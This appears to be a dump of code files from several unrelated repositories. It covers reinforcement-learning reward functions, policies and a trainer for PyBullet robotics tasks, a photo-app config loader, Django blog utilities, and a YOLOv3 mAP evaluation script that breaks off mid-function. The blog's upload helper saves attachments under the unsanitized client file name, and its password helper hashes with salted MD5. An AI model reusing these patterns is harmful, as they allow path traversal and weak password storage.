if not info['tasks'][4] and info['tasks'][3] and (info['orders'][1] == 0 or info['tasks'][5]):
r += np.exp(-norm(info['microwave_angle'] - 0)) / 6 * 3 / 4 * 1 / 2
dist = norm(info['tool_pos'] - info['microwave_handle'])
if dist > .25:
r += np.exp(-self.reward_temp * dist) / 6 / 4 * 1 / 2
else:
r += np.exp(-self.reward_temp * .25) / 6 / 4 * 1 / 2
elif info['tasks'][4]:
r += 1 / 6
if not info['tasks'][5] and info['tasks'][3] and (info['orders'][1] == 1 or info['tasks'][4]):
r += np.exp(-norm(info['fridge_angle'] - 0)) / 6 * 3 / 4 * 1 / 2
dist = norm(info['tool_pos'] - info['fridge_handle'])
if dist > .25:
r += np.exp(-self.reward_temp * dist) / 6 / 4 * 1 / 2
else:
r += np.exp(-self.reward_temp * .25) / 6 / 4 * 1 / 2
elif info['tasks'][5]:
r += 1 / 6
if info['task_success']:
r = 0
elif self.reward_type == 'dist':
r = 0
if not info['task_success']:
dist = np.linalg.norm(info['tool_pos'] - info['target_pos'])
r = np.exp(-self.reward_temp * dist + np.log(1 + self.reward_offset)) - 1
elif self.reward_type == 'custom_switch':
r = 0
if not info['task_success']:
dist = np.linalg.norm(info['tool_pos'] - info['switch_pos'][info['target_index']])
r = np.exp(-self.reward_temp * dist + np.log(1 + self.reward_offset)) - 1
elif self.reward_type == 'sparse':
r = -1 + info['task_success']
elif self.reward_type == 'part_sparse':
r = -1 + .5 * (info['task_success'] + info['door_open'])
elif self.reward_type == 'terminal_interrupt':
r = info['noop']
elif self.reward_type == 'part_sparse_kitchen':
r = -1 + sum(info['tasks']) / 6
elif self.reward_type == 'valve_exp':
dist = np.abs(self.master_env.base_env.angle_diff(info['valve_angle'], info['target_angle']))
r = np.exp(-self.reward_temp * dist) - 1
elif self.reward_type == 'blockpush_exp':
r = -1
dist = norm(info['block_pos']-info['target_pos']) + norm(info['tool_pos'] - info['block_pos'])/2
old_dist = norm(info['old_block_pos']-info['target_pos']) + norm(info['old_tool_pos'] - info['old_block_pos'])/2
under_table_penalty = max(0, info['target_pos'][2]-info['tool_pos'][2]-.1)
sigmoid = lambda x: 1/(1 + np.exp(-x))
r += sigmoid(self.reward_temp*(old_dist-dist-under_table_penalty))*self.reward_offset
if info['task_success']:
r = 0
else:
raise Exception
r = np.clip(r, *self.range)
return obs, r, done, info
def _reset(self, obs, info=None):
return obs
```
#### File: rl/path_collectors/full_traj_collector.py
```python
from rlkit.samplers.data_collector import MdpPathCollector
import pybullet as p
from rlkit.samplers.rollout_functions import rollout
from rl.misc.env_wrapper import real_gaze
import time
def _wait_for_key(env, agent, o, key=<KEY>, update_obs_class=real_gaze):
while True:
keys = p.getKeyboardEvents()
if key in keys and keys[key] & p.KEY_WAS_TRIGGERED:
break
# for some reason needed for obs to be updated
time.sleep(0.1)
for adapt in env.adapts:
if isinstance(adapt, update_obs_class):
adapt.update_obs(o)
class FullPathCollector(MdpPathCollector):
def __init__(
self,
env,
policy,
max_num_epoch_paths_saved=None,
render=False,
render_kwargs=None,
rollout_fn=rollout,
save_env_in_snapshot=True,
real_user=False
):
super().__init__(env,
policy,
max_num_epoch_paths_saved,
render, render_kwargs,
rollout_fn,
save_env_in_snapshot)
self.reset_callback = _wait_for_key if real_user else None
self.reset_callback = None
def collect_new_paths(
self,
max_path_length,
num_steps,
discard_incomplete_paths=False,
):
paths = []
num_steps_collected = 0
while num_steps_collected < num_steps:
path = self._rollout_fn(
self._env,
self._policy,
max_path_length=max_path_length,
render=self._render,
render_kwargs=self._render_kwargs,
reset_callback=self.reset_callback
)
path_len = len(path['actions'])
num_steps_collected += path_len
paths.append(path)
self._num_paths_total += len(paths)
self._num_steps_total += num_steps_collected
self._epoch_paths.extend(paths)
return paths
def get_snapshot(self):
return dict()
```
#### File: rl/policies/encdec_policy.py
```python
import numpy as np
import torch as th
from rlkit.torch.core import PyTorchModule
import rlkit.torch.pytorch_util as ptu
from rlkit.torch.distributions import (
Delta
)
from rlkit.torch.networks.stochastic.distribution_generator import DistributionGenerator
import random
from sklearn.svm import LinearSVR
class EncDecPolicy(PyTorchModule):
def __init__(self, policy, features_keys, vaes=None, incl_state=True, sample=False, latent_size=None,
deterministic=False, random_latent=False, window=None, prev_vae=None, prev_incl_state=False,
goal_baseline=False):
super().__init__()
self.vaes = vaes if vaes is not None else []
self.policy = policy
if deterministic:
assert isinstance(policy, DistributionGenerator)
self.policy = EncDecMakeDeterministic(self.policy)
self.features_keys = features_keys
self.incl_state = incl_state
self.sample = sample
self.latent_size = latent_size
if self.sample:
assert self.latent_size is not None
self.random_latent = random_latent
self.episode_latent = None
self.curr_vae = None
self.window = window if window is not None else 1
self.past_means = []
self.past_logvars = []
# use encoder to map to goals for prev vae
self.prev_vae = prev_vae
self.prev_incl_state = prev_incl_state
self.goal_baseline = goal_baseline
if self.goal_baseline:
self.x_svr_estimator = LinearSVR(max_iter=5000)
self.y_svr_estimator = LinearSVR(max_iter=5000)
def get_action(self, obs):
features = [obs[k] for k in self.features_keys]
with th.no_grad():
raw_obs = obs['raw_obs']
encoder_obs = obs.get('encoder_obs', raw_obs)
goal_set = obs.get('goal_set')
if self.random_latent:
pred_features = self.episode_latent.detach().cpu().numpy()
elif self.goal_baseline:
# baseline specific to valve env
x_pred = self.x_svr_estimator.predict(np.concatenate(features)[None])[0]
y_pred = self.y_svr_estimator.predict(np.concatenate(features)[None])[0]
self.past_means.append([x_pred, y_pred])
self.past_means = self.past_means[-self.window:]
avg_pred = np.mean(self.past_means, axis=0)
valve_pos = encoder_obs[-3:]
valve_xy = np.delete(valve_pos, 1)
avg_pred = avg_pred - valve_xy
angle_pred = np.arctan2(avg_pred[1], -avg_pred[0])
prev_encoder_inputs = [th.Tensor([np.sin(angle_pred), np.cos(angle_pred)]).to(ptu.device)]
if self.prev_incl_state:
prev_encoder_inputs.append(th.Tensor(encoder_obs).to(ptu.device))
pred_features, _ = self.prev_vae.encode(th.cat(prev_encoder_inputs))
pred_features = pred_features.cpu().numpy()
elif len(self.vaes):
if self.incl_state:
features.append(encoder_obs)
if goal_set is not None:
features.append(goal_set.ravel())
encoder_input = th.Tensor(np.concatenate(features)).to(ptu.device)
mean, logvar = self.curr_vae.encode(encoder_input)
self.past_means.append(mean)
self.past_logvars.append(logvar)
self.past_means = self.past_means[-self.window:]
self.past_logvars = self.past_logvars[-self.window:]
# use current encoder to map to latent
if self.prev_vae is None:
mean, sigma_squared = self._product_of_gaussians(self.past_means, self.past_logvars)
if self.sample:
posterior = th.distributions.Normal(mean, th.sqrt(sigma_squared))
pred_features = posterior.rsample()
else:
pred_features = mean
# use current encoder to map to goal for prev vae
else:
prev_encoder_inputs = []
prev_encoder_inputs.append(th.mean(th.stack(self.past_means), dim=0))
if self.prev_incl_state:
prev_encoder_inputs.append(th.Tensor(encoder_obs).to(ptu.device))
pred_features, _ = self.prev_vae.encode(th.cat(prev_encoder_inputs))
pred_features = pred_features.cpu().numpy()
else:
pred_features = np.concatenate(features)
obs['latents'] = pred_features
policy_input = [raw_obs, pred_features]
if goal_set is not None:
policy_input.insert(1, goal_set.ravel())
action = self.policy.get_action(*policy_input)
return action
def reset(self):
if self.random_latent:
self.episode_latent = th.normal(ptu.zeros(self.latent_size), 1).to(ptu.device)
self.policy.reset()
if len(self.vaes):
self.curr_vae = random.choice(self.vaes)
self.past_means = []
self.past_logvars = []
def _product_of_gaussians(self, means, logvars):
sigmas_squared = th.clamp(th.exp(th.stack(logvars)), min=1e-7)
sigma_squared = 1. / th.sum(th.reciprocal(sigmas_squared), dim=0)
mean = sigma_squared * th.sum(th.stack(means) / sigmas_squared, dim=0)
return mean, sigma_squared
class EncDecMakeDeterministic(PyTorchModule):
def __init__(
self,
policy,
):
super().__init__()
self.policy = policy
def forward(self, *args, **kwargs):
dist = self.policy.forward(*args, **kwargs)
return Delta(dist.mle_estimate())
def get_action(self, *obs_np):
return self.policy.get_action(*obs_np)
def get_actions(self, *obs_np):
return self.policy.get_actions()
def reset(self):
self.policy.reset()
```
#### File: rl/policies/identity_policy.py
```python
import numpy as np
from numpy.linalg import norm
import pybullet as p
class IdentityPolicy:
"""Assuming simulated keyboard, directly return the target value"""
def __init__(self,env):
self.base_env = env.base_env
self.size = env.action_space.low.size
def get_action(self, obs):
action = obs['target']
if np.count_nonzero(action):
self.action = action
else:
action = self.action
action = self.trajectory(action)
obs['latents'] = np.zeros(4)
return action, {}
def joint(self, action):
clip_by_norm = lambda traj, limit: traj / max(1e-4, norm(traj)) * np.clip(norm(traj), None, limit)
action = clip_by_norm(action, 1)
return action
def target(self, coor):
base_env = self.base_env
joint_states = p.getJointStates(base_env.robot, jointIndices=base_env.robot_left_arm_joint_indices,
physicsClientId=base_env.id)
joint_positions = np.array([x[0] for x in joint_states])
link_pos = p.getLinkState(base_env.robot, 13, computeForwardKinematics=True, physicsClientId=base_env.id)[0]
new_pos = np.array(coor) + np.array(link_pos) - base_env.tool_pos
new_joint_positions = np.array(
p.calculateInverseKinematics(base_env.robot, 13, new_pos, physicsClientId=base_env.id))
new_joint_positions = new_joint_positions[:7]
action = new_joint_positions - joint_positions
return self.joint(action)
def trajectory(self, traj):
clip_by_norm = lambda traj, min_l=None, max_l=None: traj / max(1e-4, norm(traj)) * np.clip(norm(traj),
min_l, max_l)
traj = clip_by_norm(traj, .07, .1)
return self.target(self.base_env.tool_pos + traj)
def disc_traj(self, action):
index = np.argmax(action)
traj = [
np.array((-1, 0, 0)),
np.array((1, 0, 0)),
np.array((0, -1, 0)),
np.array((0, 1, 0)),
np.array((0, 0, -1)),
np.array((0, 0, 1)),
][index]
return self.trajectory(traj)
def reset(self):
self.action = np.zeros(self.size)
```
#### File: rl/policies/keyboard_policy.py
```python
import pybullet as p
import numpy as np
class KeyboardPolicy:
def __init__(self):
self.action = np.zeros(6)
def get_action(self, obs):
keys = p.getKeyboardEvents()
inputs = [
p.B3G_RIGHT_ARROW,
p.B3G_LEFT_ARROW,
ord('r'),
ord('f'),
p.B3G_DOWN_ARROW,
p.B3G_UP_ARROW,
]
noop = True
for key in inputs:
if key in keys and keys[key] & p.KEY_WAS_TRIGGERED:
self.action = np.zeros(6)
self.action[inputs.index(key)] = 1
noop = False
return self.action, {}
def reset(self):
self.action = np.zeros(6)
```
#### File: rl/trainers/enc_dec_sac_trainer_s2_latent.py
```python
import torch as th
import numpy as np
from collections import OrderedDict
import rlkit.torch.pytorch_util as ptu
from rlkit.torch.torch_rl_algorithm import TorchTrainer
class EncDecSACTrainer(TorchTrainer):
def __init__(self,
vaes,
prev_vae,
policy,
old_policy,
qf1,
qf2,
optimizer,
latent_size,
feature_keys,
beta=1,
sample=True,
objective='kl',
grad_norm_clip=1,
incl_state=True,
prev_incl_state=False,
window_size=None
):
super().__init__()
self.policy = policy
self.old_policy = old_policy
self.qf1 = qf1
self.qf2 = qf2
self.optimizer = optimizer
self.vaes = vaes
self.prev_vae = prev_vae
self.beta = beta
self.sample = sample
self.latent_size = latent_size
self.feature_keys = feature_keys
self.objective = objective
self.grad_norm_clip = grad_norm_clip
self.incl_state = incl_state
self.prev_incl_state = prev_incl_state
self.window_size = window_size
self.second_half_latent = False
self.eval_statistics = OrderedDict()
self._n_train_steps_total = 0
self._need_to_update_eval_statistics = True
def get_diagnostics(self):
return self.eval_statistics
def end_epoch(self, epoch):
self._need_to_update_eval_statistics = True
def train_from_torch(self, batch):
vae = self.vaes[self._num_train_steps % len(self.vaes)]
feature_name = lambda x: 'curr_' + x if self.window_size is None else x + '_hist'
batch_size = batch['observations'].shape[0]
if self.second_half_latent:
batch1 = {key: batch[key][:batch_size // 2] for key in batch.keys()}
batch2 = {key: batch[key][batch_size // 2:] for key in batch.keys()}
batches = [batch1, batch2]
objectives = [self.objective, 'latent']
batch_size = batch_size // 2
lambdas = [0.1, 1]
else:
batches = [batch]
objectives = [self.objective]
lambdas = [1]
supervised_loss = ptu.zeros(1)
kl_loss = ptu.zeros(1)
latent_error = ptu.zeros(1)
for b, objective, l in zip(batches, objectives, lambdas):
obs = b['observations']
features = th.cat([b[feature_name(key)] for key in self.feature_keys], dim=1)
latents = b['curr_latents']
goals = b['curr_goal']
curr_goal_set = b.get('curr_goal_set')
has_goal_set = curr_goal_set is not None
encoder_features = [features]
if self.incl_state:
encoder_obs = b.get('curr_encoder_obs', obs) if self.window_size is None \
else b.get('encoder_obs_hist', b['obs_hist'])
encoder_features.append(encoder_obs)
# goal set and window does not work together
if has_goal_set:
curr_goal_set_flat = curr_goal_set.reshape((batch_size, -1))
encoder_features.append(curr_goal_set_flat)
mean, logvar = vae.encode(th.cat(encoder_features, dim=-1))
if self.window_size is not None:
if self.objective == 'goal':
mask = th.unsqueeze(b['hist_mask'], -1)
mean = th.sum(mean * mask, dim=1) / th.sum(mask, dim=1)
sigma_squared = None
else:
mean, sigma_squared = self._product_of_gaussians(mean, logvar, b['hist_mask'])
else:
sigma_squared = th.exp(logvar)
# regress directly to goals
if self.objective == 'goal':
supervised_loss += th.nn.MSELoss()(mean, goals)
elif self.objective == 'awr':
pred_mean, pred_logvar = vae.encode(th.cat(encoder_features, dim=1))
kl_loss += vae.kl_loss(pred_mean, pred_logvar)
supervised_loss += th.nn.GaussianNLLLoss()(pred_mean, latents.detach(), th.exp(pred_logvar))
else:
kl_loss += vae.kl_loss(mean, th.log(sigma_squared))
pred_latent = mean
if self.sample:
pred_latent = pred_latent + th.sqrt(sigma_squared) * ptu.normal(th.zeros(pred_latent.shape), 1)
if self.prev_vae is not None:
prev_encoder_features = [goals]
if self.prev_incl_state:
prev_encoder_features.append(b.get('curr_encoder_obs', obs))
if has_goal_set:
curr_goal_set_flat = curr_goal_set.reshape((batch_size, -1))
prev_encoder_features.append(curr_goal_set_flat)
target_latent = self.prev_vae.sample(th.cat(prev_encoder_features, dim=-1), eps=None)
else:
target_latent = goals
latent_error += th.mean(th.linalg.norm(pred_latent - target_latent, dim=-1))
if has_goal_set:
curr_goal_set_flat = curr_goal_set.reshape((batch_size, -1))
target_policy_features = [obs, curr_goal_set_flat, target_latent]
pred_policy_features = [obs, curr_goal_set_flat, pred_latent]
else:
target_policy_features = [obs, target_latent]
pred_policy_features = [obs, pred_latent]
if self.objective == 'kl':
target_mean = self.old_policy(*target_policy_features).mean
pred_mean = self.policy(*pred_policy_features).mean
supervised_loss += l * th.mean(th.sum(th.nn.MSELoss(reduction='none')(pred_mean, target_mean), dim=-1))
elif self.objective == 'normal_kl':
target = self.old_policy(*target_policy_features).normal
pred = self.policy(*pred_policy_features).normal
supervised_loss += l * th.mean(th.distributions.kl.kl_divergence(target, pred))
elif self.objective == 'latent':
supervised_loss += l * th.nn.MSELoss()(pred_latent, target_latent.detach())
elif self.objective == 'joint':
dist = self.policy(*pred_policy_features)
new_obs_actions, log_pi = dist.rsample_and_logprob()
if has_goal_set:
new_qf_features = [obs, curr_goal_set_flat, goals, new_obs_actions]
else:
new_qf_features = [obs, goals, new_obs_actions]
q_new_actions = th.min(
self.qf1(*new_qf_features),
self.qf2(*new_qf_features),
)
supervised_loss += l * (-q_new_actions).mean()
elif self.objective == 'non-parametric':
supervised_loss = ptu.zeros(1)
else:
raise NotImplementedError()
kl_loss /= len(batches)
latent_error /= len(batches)
loss = supervised_loss + self.beta * kl_loss
"""
Update Q networks
"""
self.optimizer.zero_grad()
loss.backward()
if self.grad_norm_clip is not None:
th.nn.utils.clip_grad_norm_(vae.encoder.parameters(), self.grad_norm_clip)
self.optimizer.step()
"""
Save some statistics for eval using just one batch.
"""
if self._need_to_update_eval_statistics:
self._need_to_update_eval_statistics = False
self.eval_statistics['Loss'] = np.mean(ptu.get_numpy(loss))
self.eval_statistics['SL Loss'] = np.mean(ptu.get_numpy(supervised_loss))
self.eval_statistics['KL Loss'] = np.mean(ptu.get_numpy(kl_loss))
self.eval_statistics['Latent Error'] = np.mean(ptu.get_numpy(latent_error))
def _product_of_gaussians(self, means, logvars, mask):
sigmas_squared = th.clamp(th.exp(logvars), min=1e-7)
mask = th.unsqueeze(mask, -1)
sigma_squared = 1. / th.sum(th.reciprocal(sigmas_squared) * mask, dim=1)
mean = sigma_squared * th.sum((means / sigmas_squared) * mask, dim=1)
return mean, sigma_squared
def compute_kl_div(self, mean, sigma_squared):
prior = th.distributions.Normal(ptu.zeros(self.latent_size), ptu.ones(self.latent_size))
posteriors = [th.distributions.Normal(m, th.sqrt(s)) for m, s in zip(th.unbind(mean), th.unbind(sigma_squared))]
kl_divs = [th.distributions.kl.kl_divergence(post, prior) for post in posteriors]
return th.mean(th.sum(th.stack(kl_divs), dim=-1))
@property
def networks(self):
nets = self.vaes + [self.policy]
return nets
def get_snapshot(self):
return dict(
vaes=tuple(self.vaes),
policy=self.policy
)
``` |
{
"source": "00SteinsGate00/Todays-Photos",
"score": 3
} |
#### File: Todays-Photos/lib/config.py
```python
import datetime
import json
class Config:
def __init__(self, config_file):
# open the file and parse the json
cfg_fp = open(config_file, 'r')
cfg_json = json.load(cfg_fp)
cfg_fp.close()
# read the properties
self.source_dir = cfg_json['source_dir']
self.destination_dir = cfg_json['destination_dir']
self.export_folder = cfg_json['export_folder']
self.target_folders = cfg_json['target_folders']
self.date_format = cfg_json['date_format']
self.delimiter = cfg_json['export_folder_delimiter'] if 'export_folder_delimiter' in cfg_json.keys() else ' '
``` |
{
"source": "00wendi00/blog-project",
"score": 3
} |
#### File: blog/utils/uploads.py
```python
import os
import uuid
import datetime as dt
from blog_project import settings
# 目录创建
def upload_generation_dir(dir_name):
today = dt.datetime.today()
# dir_name = dir_name + '/%d%d==' % (today.year, today.month)
if not os.path.exists(settings.MEDIA_ROOT + '/' + dir_name):
os.makedirs(settings.MEDIA_ROOT + '/' + dir_name)
return dir_name
# 图片上传
def image_upload(files, dir_name):
# 允许上传文件类型
image_suffix = ['jpg', 'png', 'jpeg', 'gif', 'bmp']
file_suffix = files.name.split(".")[-1]
relative_path_file = upload_generation_dir(dir_name)
path = os.path.join(settings.MEDIA_ROOT, relative_path_file)
if not os.path.exists(path): # 如果目录不存在创建目录
os.makedirs(path)
# 上传的是图片
if file_suffix in image_suffix:
file_name = str(uuid.uuid1()) + "." + file_suffix
path_file = os.path.join(path, file_name)
file_url = settings.MEDIA_URL + relative_path_file + '/' + file_name
open(path_file, 'wb').write(files.file.read())
return {"error": 0, "url": file_url}
else:
# 上传的是附件
file_name = files.name
path_file = os.path.join(path, file_name)
open(path_file, 'wb').write(files.file.read())
return {"error": 0,
"url": settings.MEDIA_URL + relative_path_file + '/' + files.name,
'filename': files.name}
```
#### File: blog/utils/utils.py
```python
import html
import re
from hashlib import md5
from django.conf import settings
from django.core.cache import cache
from blog.models import Tag, Blog, Catagory
def getIP(request):
"""
get request ip
:param request:
:return:
"""
if request.META.get('HTTP_X_FORWARDED_FOR'):
ip = request.META['HTTP_X_FORWARDED_FOR']
else:
ip = request.META['REMOTE_ADDR']
return ip
def gainCipher(password, salt=settings.MD5_SALT):
"""
密码加盐加密
:param password:
:param salt:
:return:
"""
if password:
m1 = md5()
m1.update(password.encode('utf-8'))
p = m1.hexdigest()
m2 = md5()
m2.update((p + salt).encode('utf-8')) # 加盐
p = m2.hexdigest()
return p
return None
def get_tags_dict(new=False):
"""
缓存和获取所有博客的tags
:return: {'blog_id':'tag1 tag2'}
"""
if new:
tags_dict = None
else:
tags_dict = cache.get('tags_dict')
if not tags_dict:
tags_list = Tag.objects.all().values_list('blog', 'blog__tags__name')
tags_dict = {}
for item in tags_list:
if item[0] in tags_dict:
if item[1] not in tags_dict[item[0]]:
tags_dict[item[0]].append(item[1])
elif item[0]:
tags_dict[item[0]] = [item[1]]
tags_dict = {key: ' '.join(tags_dict[key]) for key in tags_dict}
cache.set('tags_dict', tags_dict, 3600 * 24 * 30)
return tags_dict
def get_desc(blog_id=0):
"""
缓存和获取所有description, 0存的是所有的title, 其他id存内容
:return: {0:'all title', blog_id:'contet'}
"""
desc_dict = cache.get('desc_dict')
if not desc_dict or not desc_dict.get(blog_id):
desc_dict = {}
tags = Tag.objects.all().filter(isDelete=False).values('name', 'remark')
titles = ' '.join([tag['name'] + ' ' + tag['remark'] for tag in tags])
categorys = Catagory.objects.all().filter(isDelete=False).values('name', 'remark')
titles += ' '.join([category['name'] + ' ' + category['remark'] for category in categorys])
blogs = Blog.objects.all().filter(isDraft=False, isDelete=False).values('id', 'title', 'content')
for blog in blogs:
titles += blog['title'] + ' '
pattern = re.compile(r'<pre.*?>.*?</pre>', re.S)
res = re.sub(pattern, '', blog['content'])
if res:
pattern = re.compile(r'<.*?>|\n|\r|\t| ', re.S)
res = re.sub(pattern, '', res)
res = html.unescape(res).strip()
desc_dict[blog['id']] = res or ' '
desc_dict[0] = titles
cache.set('desc_dict', desc_dict, 3600 * 24 * 30)
return '张文迪 博客 ' + desc_dict[blog_id]
``` |
{
"source": "00why00/yolov3-tf2",
"score": 2
} |
#### File: yolov3-tf2/mAP/mAP.py
```python
import os
import sys
import shutil
import glob
import json
import operator
import math
import cv2
import numpy as np
import matplotlib.pyplot as plt
from absl import app, flags, logging
from absl.flags import FLAGS
"""
计算 mAP
"""
flags.DEFINE_boolean('no_animation', True, 'no animation is shown')
flags.DEFINE_boolean('no_plot', True, 'no plot is shown')
flags.DEFINE_boolean('quiet', False, 'minimalistic console output')
# e.g. python mAP.py -ignore "person book"
flags.DEFINE_spaceseplist('ignore', None, 'ignore a list of classes')
# e.g. python mAP.py -set_class_iou "person 0.7 book 0.6"
flags.DEFINE_spaceseplist('set_class_iou', None, 'set IoU for a specific class')
# 见 http://host.robots.ox.ac.uk/pascal/VOC/voc2012/htmldoc/devkit_doc.html#4.4
MINOVERLAP = 0.5
'''
0,0 -------------> x (width)
|
| (Left,Top)
| *_________
| | |
| | |
y |_________|
(height) *
(Right,Bottom)
'''
def calculate_log_average_miss_rate(precision, recall):
"""
在区间 [1e-2, 1]以对数空间均匀分为 9 份,计算平均的 MR
:param precision: 精确率 TP / (TP + FP) = TP / n
:param recall: 召回率 TP / (TP + FN) = TP / P
:return: lamr: log-average miss rate
:return: mr: miss rate MR = FN / (TP + FN) = FN / P
:return: fppi: false positive per image FPPI = FP / (TP + FP) = FP / n
"""
# 如果没有此类的预测
if precision.size == 0:
lamr = 0
mr = 1
fppi = 0
return lamr, mr, fppi
fppi = 1 - precision
mr = 1 - recall
# 在起止位置插入值防止越界
fppi_tmp = np.insert(fppi, 0, -1.0)
mr_tmp = np.insert(mr, 0, 1.0)
# 将[1e-2, 1e0]在对数空间均匀分为 9 份
ref = np.logspace(-2.0, 0.0, num=9)
for i, ref_i in enumerate(ref):
# 因为 ref 的最小值为 0.01,fppi_tmp 的最小值为 -1.0
# 所以一定可以找到至少一个索引
j = np.where(fppi_tmp <= ref_i)[-1][-1]
ref[i] = mr_tmp[j]
lamr = math.exp(np.mean(np.log(np.maximum(1e-10, ref))))
return lamr, mr, fppi
def check_float_between_0_and_1(value):
"""
检查数字是不是一个在0和1之间的浮点数
"""
try:
val = float(value)
if 0.0 < val < 1.0:
return True
else:
return False
except ValueError:
return False
def voc_ap(precision, recall):
"""
参考:http://host.robots.ox.ac.uk/pascal/VOC/voc2012/htmldoc/devkit_doc.html#3.4
根据 precision 和 recall 数组计算 AP:
1、计算随着 precision 递减的 Precision-recall 曲线
2、AP 就是 Precision-recall 曲线下面的面积
代码参考 VOC development kit code 中 VOCap.m
:param precision: 精确率 TP / (TP + FP) = TP / n
:param recall: 召回率 TP / (TP + FN) = TP / P
:return: ap: average-precision 平均精度
:return: precision: 横轴
:return: recall: 纵轴
"""
# 在 precision 和 recall 数组前后插值
precision.insert(0, 0.0)
precision.append(0.0)
recall.insert(0, 0.0)
recall.append(1.0)
# 让 precision 单调递减(从后往前)
for i in range(len(precision) - 2, -1, -1):
precision[i] = max(precision[i], precision[i + 1])
# 记录 recall 改变的位置
change_list = []
for i in range(1, len(recall)):
if recall[i] != recall[i - 1]:
change_list.append(i)
# 使用数值积分计算 Precision-recall 曲线下面的面积
ap = 0.0
for i in change_list:
ap += ((recall[i] - recall[i - 1]) * precision[i])
return ap, precision, recall
def file_lines_to_list(path):
"""
将文件按行保存成列表
"""
with open(path) as f:
content = f.readlines()
# 去除每一行末尾的 空格 或 \n
content = [x.strip() for x in content]
return content
def draw_text_in_image(img, text, pos, color, line_width):
"""
在图片上写字
"""
font = cv2.FONT_HERSHEY_PLAIN
font_scale = 1
line_type = 1
bottom_left_corner_of_text = pos
cv2.putText(img, text, bottom_left_corner_of_text, font, font_scale, color, line_type)
text_width, _ = cv2.getTextSize(text, font, font_scale, line_type)[0]
return img, (line_width + text_width)
def adjust_axes(renderer, text, fig, axes):
"""
调整 plot 坐标轴
"""
# 计算文字宽度用于重新缩放
box = text.get_window_extent(renderer=renderer)
text_width_inches = box.width / fig.dpi
# 计算缩放比例
current_fig_width = fig.get_figwidth()
new_fig_width = current_fig_width + text_width_inches
proportion = new_fig_width / current_fig_width
# 设置坐标轴最大值
x_lim = axes.get_xlim()
axes.set_xlim([x_lim[0], x_lim[1] * proportion])
def draw_plot_func(dictionary, num_classes, window_title, plot_title, x_label, output_path, if_show, plot_color, tp_bar):
"""
使用 Matplotlib 绘图
"""
# 降序排列字典的值到元组列表中
sort_dic_by_value = sorted(dictionary.items(), key=operator.itemgetter(1))
# 解压元组列表为两个列表
sorted_keys, sorted_values = zip(*sort_dic_by_value)
# 有 TP 数组时
if tp_bar != "":
"""
绿色:TP
红色:FP
粉色:FN
"""
fp_sorted = []
tp_sorted = []
for key in sorted_keys:
fp_sorted.append(dictionary[key] - tp_bar[key])
tp_sorted.append(tp_bar[key])
# 绘制水平直方图
plt.barh(range(num_classes), fp_sorted, align='center', color='crimson', label='False Positive')
plt.barh(range(num_classes), tp_sorted, align='center', color='forestgreen', label='True Positive',
left=fp_sorted)
plt.legend(loc='lower right')
# 标数值
fig = plt.gcf()
axes = plt.gca()
renderer = fig.canvas.get_renderer()
for i, val in enumerate(sorted_values):
fp_val = fp_sorted[i]
tp_val = tp_sorted[i]
fp_str_val = " " + str(fp_val)
tp_str_val = fp_str_val + " " + str(tp_val)
text = plt.text(val, i, tp_str_val, color='forestgreen', va='center', fontweight='bold')
plt.text(val, i, fp_str_val, color='crimson', va='center', fontweight='bold')
if i == (len(sorted_values) - 1):
adjust_axes(renderer, text, fig, axes)
else:
# 绘制水平直方图
plt.barh(range(num_classes), sorted_values, color=plot_color)
# 标数值
fig = plt.gcf()
axes = plt.gca()
renderer = fig.canvas.get_renderer()
for i, val in enumerate(sorted_values):
str_val = " " + str(val)
if val < 1.0:
str_val = " {0:.2f}".format(val)
text = plt.text(val, i, str_val, color=plot_color, va='center', fontweight='bold')
if i == (len(sorted_values) - 1):
adjust_axes(renderer, text, fig, axes)
# 设置窗口标题
fig.canvas.set_window_title(window_title)
# 在 y 轴上写类名
tick_font_size = 12
plt.yticks(range(num_classes), sorted_keys, fontsize=tick_font_size)
# 相应的缩放高度
init_height = fig.get_figheight()
dpi = fig.dpi
height_pt = num_classes * (tick_font_size * 1.4) # 1.4 为间距
height_in = height_pt / dpi
top_margin = 0.15 # 百分比
bottom_margin = 0.15 # 百分比
figure_height = height_in / (1 - top_margin - bottom_margin)
if figure_height > init_height:
fig.set_figheight(figure_height)
# 设置图标题
plt.title(plot_title, fontsize=14)
# 设置坐标轴名称
plt.xlabel(x_label, fontsize='large')
# 适应窗口大小
fig.tight_layout()
# 保存图表
fig.savefig(output_path)
# 展示
if if_show:
plt.show()
plt.close()
def main(_argv):
# 检查是否有要忽略的类别
if FLAGS.ignore is None:
FLAGS.ignore = []
# 设置文件路径
ground_truth_path = os.path.join(os.getcwd(), '../data', 'ground_truth')
detection_results_path = os.path.join(os.getcwd(), '../data', 'detection_result')
image_path = os.path.join(os.getcwd(), '../data', 'VOCdevkit', 'VOC2012', 'JPEGImages')
# 没有图片时设置 no_animation 为 True
if os.path.exists(image_path):
for root, dirs, files in os.walk(image_path):
if not files:
FLAGS.no_animation = True
else:
FLAGS.no_animation = True
# 创建 temp 和 output 目录
temp_file_path = '.temp'
if not os.path.exists(temp_file_path):
os.makedirs(temp_file_path)
output_file_path = 'output'
if not os.path.exists(output_file_path):
os.makedirs(output_file_path)
else:
shutil.rmtree(output_file_path)
os.makedirs(output_file_path)
if not FLAGS.no_plot:
os.makedirs(os.path.join(output_file_path, 'classes'))
if not FLAGS.no_animation:
os.makedirs(os.path.join(output_file_path, 'images', 'detections_one_by_one'))
"""
获取并解析 ground truth 文件
"""
# 得到 ground truth 文件的列表
ground_truth_file_list = glob.glob(ground_truth_path + '/*.txt')
if len(ground_truth_file_list) == 0:
logging.error("没有找到ground truth文件!")
sys.exit(0)
ground_truth_file_list.sort()
ground_truth_counter_per_class = {}
image_counter_per_class = {}
ground_truth_file = []
for txt_file in ground_truth_file_list:
file_id = txt_file.split(".txt", 1)[0]
file_id = os.path.basename(os.path.normpath(file_id))
# 检查是否有对应的 detection result 文件
result_path = os.path.join(detection_results_path, (file_id + '.txt'))
if not os.path.exists(result_path):
error_msg = "没有找到: {}\n".format(result_path)
logging.error(error_msg)
sys.exit(0)
lines_list = file_lines_to_list(txt_file)
# 创建 ground truth 的字典
bounding_boxes = []
already_seen_classes = []
for line in lines_list:
try:
if "difficult" in line:
class_name, left, top, right, bottom, _difficult = line.split()
is_difficult = True
else:
class_name, left, top, right, bottom = line.split()
is_difficult = False
except ValueError:
error_msg = txt_file + "格式错误"
logging.error(error_msg)
sys.exit(0)
# 检查是否有忽略的类
if class_name in FLAGS.ignore:
continue
bbox = left + " " + top + " " + right + " " + bottom
bounding_boxes.append({"class_name": class_name,
"bbox": bbox,
"used": False,
"difficult": is_difficult})
# 对于难识别的物体,不计算
if not is_difficult:
# 对每个类的标记进行计数
